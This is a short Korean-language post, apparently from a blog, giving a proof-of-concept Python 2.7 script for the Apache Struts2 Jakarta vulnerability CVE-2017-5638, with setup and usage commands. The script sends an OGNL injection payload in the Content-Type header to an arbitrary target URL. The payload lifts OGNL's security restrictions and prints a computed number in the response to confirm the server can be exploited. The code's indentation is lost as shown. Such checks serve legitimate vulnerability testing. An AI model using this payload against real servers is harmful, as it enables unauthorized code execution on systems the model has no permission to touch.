Apache Struts2 취약점 jakarta (CVE-2017-5638) POC
python 2.7 설치
CMD창 명령어 입력
c:\Python27\python.exe -m pip install requests
CVE-2017-5638.py 생성
import requests
import sys
def poc(url):
payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
headers = {}
headers["Content-Type"] = payload
r = requests.get(url, headers=headers)
if "105059592" in r.content:
return True
return False
if __name__ == '__main__':
if len(sys.argv) == 1:
print "python s2-045.py target"
sys.exit()
if poc(sys.argv[1]):
print "vulnerable"
else:
print "not vulnerable" |
CMD창 명령어 입력
CVE-2017-5638.py http://xxx.xxx.xxx.xxx
not vulnerable 나오면 미취약
vulnerable 나오면 취약